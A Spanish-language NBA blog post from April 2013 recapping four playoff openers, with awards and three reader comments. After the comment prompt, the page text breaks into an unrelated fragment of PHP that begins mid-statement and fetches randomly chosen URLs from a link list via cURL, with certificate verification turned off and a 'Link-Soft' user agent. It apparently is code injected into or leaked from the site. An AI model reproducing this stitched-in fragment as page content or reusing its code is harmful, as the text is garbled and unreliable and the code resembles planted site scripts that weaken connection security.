La crónica: André el Gigante

21 de April de 2013 por TheDeerHunter

Por fin empieza lo bueno. Queda inaugurada la postemporada del curso baloncestístico 2012-2013. Cuatro pedazo de choques, uno detrás de otro, para atraparnos ante la pantalla durante casi 12 horas llegado el caso.

Melo Pierce

Abríamos con plato fuerte en el Madison, donde los Celtics perdieron una buena oportunidad de hacer una de las suyas. Perfecto planteamiento de salida de Doc, con Pierce como escolta facilitador y Bradley o Green ejecutando de manera sorprendente. Los Knicks, visiblemente incómodos abusando de aclarados y lanzamientos forzados, con ataques cada cual más previsible y Melo rozando puntualmente el cortocircuito. Varios titulares de Woodson estuvieron muy perdidos ante la inteligente táctica rival. Esta fue la tónica hasta casi el final del tercer cuarto, cuando los Celtics parecían demarrar 7 arriba y Pierce oliendo sangre. Es la típica situación en la que no suelen perdonar… pero lo hicieron. Desde el 1’20” para terminar el tercero hasta el final los Celtics fueron una caricatura de sí mismos. Sólo 8 puntos, apagón de los que habían tirado del carro hasta el momento y error tras error, en el tiro, en el rebote o en el control del balón… una auténtica calamidad pagando caro el sobreesfuerzo por contar con una segunda unidad inoperante en contraposición a Kidd, Kenyon y JR Smith, decisivos, que tocaban a zafarrancho local. Tanto regalo que terminó agradeciendo Anthony a placer, para maquillar una actuación menos brillante de lo que indicarán mañana los titulares. (78-85)

Quien sí deslumbró en una actuación antológica fue su ex compañero André Miller, con canasta ganadora incluida. Qué bonito es este deporte cuando se impone la clase y la inteligencia. André impuso toda una carrera de experiencia para hacer prácticamente lo que le dio la gana, y a sus compañeros no les preocupó buscarle obsesivamente. Fue una isla de claridad en un partido muy espeso de los Nuggets, a los que les acompañó la suerte también en la lesión de David Lee, quien apenas pudo disputar algún minuto en el último cuarto. Los Warriors funcionaron por arreones de talento de Curry y Thompson, además del control de los tableros, pero la actitud de ambos contendientes fue tan lúdica y descontrolada que por momentos parecían olvidarse de lo que estaban en juego. En medio de ese punto de caos pudo haberse apuntado la victoria cualquiera. (95-97)

griffin grizzEn Brooklyn los Nets abusaron de los Bulls. Jugó Noah, pero como si no lo hubiera hecho, y Hinrich firmó 2 puntos, 2 asistencias en 28 minutos, el peor registro combinado puntos-asistencias de un base titular de este equipo en las últimas 15 campañas. Los dos nombres que le siguen en esa estadística son también Hinrich. Así que sin Rose… demasiado arroz para tan poco pollo, porque los Nets estuvieron particularmente contundentes con 6 hombres en dobles figuras. Los sistemas defensivos de Thibodeau nada pudieron hacer ante un dominio ofensivo total, especialmente en la pintura. Anotaron 56 puntos del total en ella, y en el segundo cuarto firmaban un 16 de 20 en tiros. Cuando quisieron y como quisieron. (89-106)

Finalmente tampoco hubo color en la visita de Grizzlies al Staples. La diferencia se forjó sorprendentemente en la pintura, con una diferencia de rebotes de 47 a 23, las dos terceras partes fueron del lado local. Marc capturaría 2 rebotes y Zach 4, y a partir de ahí todo se complica mucho. Para empezar, siendo su principal fortaleza, los Grizzlies cedieron 25 puntos en segundas oportunidades y así no hay defensa que valga. En el aspecto ofensivo, los Grizzlies sólo encontraron un referente efectivo en Bayless, mientras que los Clippers movieron hasta a 7 hombres en las dobles figuras. (91-112)

andre

PREMIOS

MVP: El jovencito de 37 años André Miller nos brindó anoche una de las mayores exhibiciones de su vida y el primer game-winner de su carrera. Es el tercer hombre que lo logra en Playoffs a esa edad en los últimos 15 años, tras Payton y Stockton. Durante la segunda parte fue en plan “balones a André”, con un 8 de 12 en ella. Jugón como pocos.

La sorpresa: La actuación de CJ Watson tiene ciertos tintes de revanchismo, por el papel que disfrutó en Chicago en este tipo de momentos. Si lo hizo ante un Hinrich a ese nivel es doblemente vendetta.

La decepción: El último cuarto de los Celtics, durante el que perdieron tantos balones (8) como puntos anotaron, o la terrible pájara reboteadora sufrida por los Grizzlies.

El mayor esfuerzo en vano: En el primer partido de playoffs de su carrera, y pese a empezar fallando sus nueve primeros lanzamientos, Curry lograba anotar un triple desesperado a falta de 14 segundos para intentar llevar el choque a la prórroga. Se combinó con Klay Thompson para dar un buen susto a los Nuggets, pero todo quedó en eso.

TOP 10

Comenta

3 comentarios a esta entrada

  1. rumbero dice:
    #1

    Pues no fue el mejor partido de Nuggets ni Warriors pero estuvo muy entretenido. Algo de descontrol y nervios supongo. De ahí sobresalió por encima de todos un tipo como Miller que se ha visto en unas cuantas como esta para marcarse un partidazo. Nuggets peor de lo habitual en triple, mal en el rebote, con una buena defensa sobre Curry al inicio pero con algunos despistes defensivos.. pero aun asi ganando el 24 en casa. Necesitan a Faried y Lawson al 100%. A los Warriors les faltó algo más de control y que Curry apareciera antes. Bien Thompson (mucha calidad este chico que siempre queda tapado por Stephen) y buen partido en la pintura de Bogut a pesar que Javale le hiciera un poster. Veremos como está Lee también que va a ser clave. Hay serie

      Citar

  2. Ruxixón dice:
    #2

    Se confirma que David Lee es baja todos los PO,así que las opciones de que pasen los Warriors se esfuman.Una auténtica pena que llegados a este punto no puedan competir con todas sus armas,desluciendo la eliminatoria más atractiva de ver.Dejo link de la noticia http://nba.si.com/2013/04/21/david-lee-hip-injury-update-out-for-season-warriors-nuggets/

    Sorprendente que el duelo reboteador fuera tan desequilibrado en el Staples.Mucho de aspecto psicológico esta eliminatoria,por supuesto con rencillas pendientes.A Z-Bo se le vio pegándose con Blake Griffin en muchísimas ocasiones,y a Marc Gasol,en ciertas acciones,se le vio un tanto nervioso,supongo que por el desarrollo del encuentro.Por otro lado sabemos que la segunda unidad de Clippers siempre va a estar ahí y desde luego no hay color en el duelo CP3 vs Conley.No sé,la verdad es que los ositos tienen una eliminatoria complicada.

    Rondo(cansancio de los jugadores clave) y Rose(Deron a este nivel),bajas demasiado importantes para sus equipos en estos PO.

      Citar

  3. GreenPride dice:
    #3

    Y empiezo como terminé la regular, ¡Malditas lesiones! Una eliminatoria que se presentaba igualada y de los más entretenida con Warriors y Nuggets corriendo y anotando de un lado a otro se nos queda mucho más descafeinada con la baja de David Lee. En el primer partido los Nuggets se vieron abajo y tuvieron que recurrir a darle el balón a uno de los bases más infravalorados de la competición como Andre Miller. Un jugadorazo a sus 37 tacos que les sacó las castañas del fuego con game winner incluido y metiéndolas de todos los colores. Exhibición de Miller y los Nuggets que jugaron sin Faried ahora toman gran ventaja gracias a la lesión de Lee que deja a los Warriors sin su referencia interior. Aún podrán llevarse algún partido apoyados en sus exteriores pero es difícil que puedan ya luchar por la eliminatoria.
    En New York, los Ceiltics dejaron escapar una gran oportunidad. Con una gran defensa sobre Melo a partir del minuto 5, le obiligaron a lanzar con bajos porcentajes y movieron el balón con sabiduría durante 3 cuartos pero en el último sufrieron un gran apagón en ataque y eso les hizo perder el partido cuando habían cobrado ventaja. Bien Green y Bradley durante los 3 primeros cuartos en ataque pero si los Celtics quieren ganar necesitan las contribuciones de Garnett y de alguien del banco (Terry?????) para hacerlo. Por los Knicks, lo mejor que sacaron adelante el partido gracias a su defensa.
    En Brooklyn no hubo partido. Un Deron en su mejor forma baloncestística dirigió un equipo que parece en muy buena forma y en el Lopez hizo carbón a Noah. Los Bulls no defendieron nada y este equipo sin su defensa no va a ningún lado. Veremos si la bronca que les va a echar Thiboudeau les sirve para reaccionar.
    Y por último empezó la mejor eliminatoria en el Clippers-Grizzlies con una paliza inesperada. Si te cogen más del doble de rebotes teniendo a Marc&Zach es que te han ganado clarísimamente en intensidad. Con ello, un poco de CP3 y los lanzamientos y carreras de sus exteriores les bastó a los Clips para sacar del partido a unos Grizzlies que deberán ser mucho más duros si quieren plantar cara en la eliminatoria. Yo creo que reaccionarán seguro y que esta noche ya habrán dado mucha más guerra. Veremos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>